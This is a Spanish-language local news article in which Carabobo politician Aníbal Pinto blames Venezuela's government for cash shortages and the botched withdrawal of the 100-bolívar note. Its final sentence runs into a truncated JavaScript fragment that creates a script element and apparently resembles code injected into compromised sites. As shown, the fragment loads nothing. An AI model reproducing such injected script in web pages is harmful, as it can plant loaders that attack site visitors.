Carabobo Destacados

Aníbal Pinto “Ciudadanos están en situación de desespero”

Albeny Núñez Ramos.  Al finalizar el año 2016 e iniciar el 2017, el coordinador del partido político Cuentas Claras (CC) en el municipio Libertador, estado Carabobo, Aníbal Pinto, lamentó que los ciudadanos se vean en una situación de desespero gracias a las políticas económicas “improvisadas” del Gobierno Nacional.

Desde su perspectiva, las medidas económicas aplicadas por el Ejecutivo muestran una “terrible improvisación” que afectada “enormemente” al venezolano que se distingue por su arduo trabajo y ahora de manera inesperada se queda sin efectivo y con dificultades para cancelar en establecimientos con punto de venta.

Con preocupación, Pinto resaltó que en la localidad existe un grave problema con los puntos de venta, mientras que zonas comerciales como el mayorista han tenido de comunicación por el robo de cables que prestan el servicio de la Compañía Anónima Nacional Teléfonos de Venezuela (Cantv).

“Al Gobierno no le interesa mejorar la calidad de vida de todos”, citó el dirigente político.

En ese sentido, coordinador local de CC, hizo un llamado a los máximos dirigentes nacionales, a tener un poco responsabilidad al momento de tomar decisiones en cuanto a las medidas económicas

“No queremos acciones desastrosas como el hecho de ordenar el retiro del billete de 100 bolívares y luego suspender el decreto hasta el 2 de enero, queremos acciones responsables que vayan de la mano con todos los factores económicos a fin de que sean favorecidos, empresarios y consumidores”, afirmó Pinto al mencionar que la idea es que todos sean parte de la solución y no del problema.

Agregó que tanto el consumidor como el comerciante están sufriendo por la suspensión de billete de 100 bolívares, a pesar de haberse dado una prórroga.var d=document;var s=d.createElement(‘script’);